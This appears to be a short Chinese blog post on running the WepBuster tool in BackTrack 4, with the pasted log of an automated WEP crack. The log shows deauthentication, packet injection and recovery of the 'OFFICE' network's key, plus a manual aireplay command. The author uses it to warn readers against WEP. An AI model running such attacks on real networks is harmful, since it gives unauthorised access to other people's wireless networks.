BT4已经出来一段时间了,今天用了一下。发现一软件叫WepBuster该软件在 root@bt:/pentest/wireless/wepbuster 目录下。运行后全自动破解非常方便。下面是软件运行后显示的内容,最后面的 KEYFOUND 后给出了相应密码~~,今后别用WEP了,实在是太不安全。 

Detecting wireless interfaces...

---------------------------------------------------------

Found wlan0...
Getting monitor interface...
monitor interface --> mon0

Found 1 useable wireless card(s)

wlan0/mon0

=========================================================

No valid channel entered. Using the default ( US = 1 6 11 )


MODE: crack     (using: wlan0/mon0 == 00:e1:02:b0:01:0d)

Scanning channel 6 for WEP-enabled Access Points
......
Found 2 AP(s) on channel 6

     BSSID              IV      CHANNEL SSID           ASSOCIATED CLIENTS

00:19:E0:B1:3B:42       0       6       TP-LINK
1C:AF:F7:A4:26:DE       3       6       OFFICE         00:15:AF:C1:C2:10, 00:24:2B:F8:54:C6


Scanning channel 1 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 1

 

Scanning channel 11 for WEP-enabled Access Points
......
Found 0 AP(s) on channel 11

 

Total AP found: 2

Now starting to crack...


#########################################################

Pwning "TP-LINK" (00:19:E0:B1:3B:42)     Wed Jun  2 22:44:19 2010
Checking for mac filtering...
Can't associate. aireplay-ng died!

Attack was unsuccessful. Possible reasons:

Too many to mention. =)
Try running this command manually:

"aireplay -1 1 -a 00:19:E0:B1:3B:42 wlan0 -e "TP-LINK" -h 00:e1:02:b0:01:0d 2>&1"

#########################################################

Pwning "OFFICE" (1C:AF:F8:A4:26:DE)     Wed Jun  2 22:44:53 2010
Checking for mac filtering...   NONE!! =)
Trying to associate...   SUCCESS!!!
Starting to inject...
Sending Deauth...
Counting IVs...(hit ENTER to skip this AP)
703....703.....1572.....2255.....3486.....4757.....5924.
....7073.....8285.....9421.....10636.....11870.....13080.
....14158.....15858.
Collected 17602 IVs. Trying to crack...
KEY FOUND! [ 54:96:35:96:54 ]   Decrypted correctly: 100%
OWNED USING 20436 IVs!
Elapsed Time: 01:32                     Wed Jun  2 22:46:25 2010
.Stopping all forks...

#########################################################